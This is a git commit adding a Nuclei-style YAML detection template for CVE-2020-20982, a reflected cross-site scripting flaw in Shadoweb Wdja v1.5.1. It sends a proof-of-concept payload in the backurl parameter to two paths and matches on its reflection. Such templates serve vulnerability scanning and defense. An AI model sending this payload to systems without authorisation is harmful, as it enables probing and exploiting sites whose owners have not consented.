Create CVE-2020-20982.yaml
parent
c04074406b
commit
8463cfd824
|
@ -0,0 +1,28 @@
|
|||
id: CVE-2020-20982
|
||||
|
||||
info:
|
||||
name: Shadoweb Wdja v1.5.1 xss
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
tags: cve,cve2020,xss,wdja
|
||||
reference:
|
||||
- https://github.com/shadoweb/wdja/issues/1
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-20982
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/php/passport/index.php?action=manage&mtype=userset&backurl=';alert(document.domain);//"
|
||||
- "{{BaseURL}}/passport/index.php?action=manage&mtype=userset&backurl=';alert(document.domain);//"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
condition: and
|
||||
words:
|
||||
- 'alert(document.domain);//'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'text/html'
|
Loading…
Reference in New Issue